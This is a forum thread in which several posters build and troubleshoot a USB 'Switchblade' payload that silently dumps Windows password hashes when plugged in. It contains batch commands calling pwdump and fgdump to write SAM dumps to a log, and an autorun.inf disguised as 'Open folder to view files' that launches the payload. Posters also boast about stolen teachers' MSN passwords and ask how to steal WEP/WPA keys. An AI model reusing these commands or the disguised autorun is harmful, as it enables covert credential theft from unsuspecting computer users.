marc

darkjoker, I received that error a few times, but mainly in a media centre PC. What OS gives you that? A google search seems to show results for all kinds of USB devices, and therefore I do not think its the payload that gives that problem. Erdnase, can I guess where you got your nickname from? Anything to do with S.W.Erdnase's expert at the card table?

hey guys, Here is my payload as it stands (not all of it, just certain files): http://www.marc.ph/switchblade I also have a BAT file which renames the go.cmd to go1.cmd, in order to deactivate/activate the payload. I am wondering of a way that I could do a similar thing but with the U3 Launchpad, so that it can either be 100% silent when plugging in, or display the launchpad. Hope you guys can help, Marc

My stupidity. I kept the other files in the same DIR as the pwdump.exe, not in the calling directory.

Sorry, I forgot to mention. I have tried this on multiple machines, all with the same error. Some have AV's, some don't. All give the same error.

Yes, I do have the files, in the WIPCMD folder, along with pwdump. Still getting the error. I will show you how I am calling it: Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo ***********[Dump SAM]*************** >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 ..WIPCMDpwdump 127.0.0.1 >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo ***********[Dump SAM1]*************** >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 ..WIPCMDfgdump 127.0.0.1 >> ....Documentslogfiles%computername%.log 2>&1

I cant seem to get my SAM dump working with PWdump or even FGdump. Here is the error I seem to get: ************************************ ***********[Dump SAM]*************** ************************************ Service start failed: 2 pwdump6 Version 1.4.3 by fizzgig and the mighty group at foofus.net Copyright 2006 foofus.net This program is free software under the GNU General Public License Version 2 (GNU GPL), you can redistribute it and/or modify it under the terms of the GNU GPL, as published by the Free Software Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS PROGRAM. Please see the COPYING file included with this program and the GNU GPL for further details. ************************************ ***********[Dump SAM1]*************** ************************************ fgDump 1.5.0 - fizzgig and the mighty group at foofus.net *** THIS IS A BETA VERSION, YOU HAVE BEEN WARNED *** Written to make j0m0kun's life just a bit easier Copyright(C) 2007 fizzgig and foofus.net fgdump comes with ABSOLUTELY NO WARRANTY! This is free software, and you are welcome to redistribute it under certain conditions; see the COPYING and README files for more information. Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system. Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system. Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system. Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system. Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system. Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system. Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system. Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system. Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system. Starting dump on 127.0.0.1 ERROR GetOSVersion: 53 - The network path was not found. ** Beginning local dump ** Unable to determine OS version, see previous error for details Could not connect to service manager: this may be a Win95, 98, SNAP or other non-NT-based system. CRITICAL: Error retrieving remote service information. Remote registry may not be running, simple file sharing may be enabled, or the account may not have 'Log On as Batch Job' permission. Skipping this host. Error dumping server 127.0.0.1, see previous messages for details -----Summary----- Failed servers: 127.0.0.1 Successful servers: NONE Total failed: 1 Total successful:

Thank you very much for this. Helped me a lot in getting the U3 software working nicely with my payload.

-deleted post. I posted too soon for help with the U3 version payload, without giving it a good shot myself. Apologies.

We need a USB Penknife. Like I said before, proper install with customisable features, the first page perhaps asking if the device is U3 or not, etc.

Wuss :P. Lol, kidding. I do have about 4 teachers msn passwords and that though.

Heh, going pretty good eh MaxDamage edit: i think theres been so much work, im now spoilt for choice when going to extract a bunch of files to my USB drive. One super version combining the lot would be great. Perhaps a setup install, allowing people to choose what type of drive they want/what they want the drive to do. I guess its easy for me to say this rather than get down and write myself. Keep it up guys.

Hmm. This is using Amish's autorun.inf?

Yep Poyboy, i get that too on this machine, along with a Mozy Remote window opening up. How about WEP Keys, or any wireless details? I'm using Amish's version on laptops and it would be great to steal WEP/WPA details for use with my own laptop or nintendo DS linux.

Nice one DLSS!

Guys, this thread is a great conversation and a great resource. However, i really feel we should just pause time here and put a nice how-to on the wiki. Or at least sum up so far.

I'm thinking of buying a U3 device. Is it worth it? Or perhaps stick with the non-u3 version? Is U3 worth it just for the real U3 technology, i.e. out of the box? I might get a cruzer 1gb.

Absolutely Silva, but I am talking about the general knowledge you can get from this. Who would expect a flash disk to have a CD partition? I know some people just use common sense instead of any real AV, but very little can be trusted.

Sorry for double post, but I just have something involving morals to say. I believe that learning this can help ourselves for antivirus protection. Our knowledge on the tricks used by viruses can only expand, such as that social trick on Amish's version, or the U3 CD partition. No longer will I feel safe that by inserting a USB drive into my PC, nothing will execute unless I double click on what I want. AV's should realise that we do want to learn about this stuff. It is very useful to know. Besides, how can an AV block a social trick in autorun.inf? There are somethings we NEED to know about.

Damn this works well. I edited the autorun.inf file (on the amish/non-u3 version) to make it more realistic: [autorun] action=Open folder to view files icon=iconsfolder.ico shellexecute=nircmd.exe execmd CALL batexeprogstart.bat

(offtopic, hows your finger?)

I added a quick guide for n00bs. Not the best, but when I wanted quick info on how to do this on my LAKS USB watch, it really took time searching the thread.

Someone really needs to help put all this on the wiki. I'll help where possible.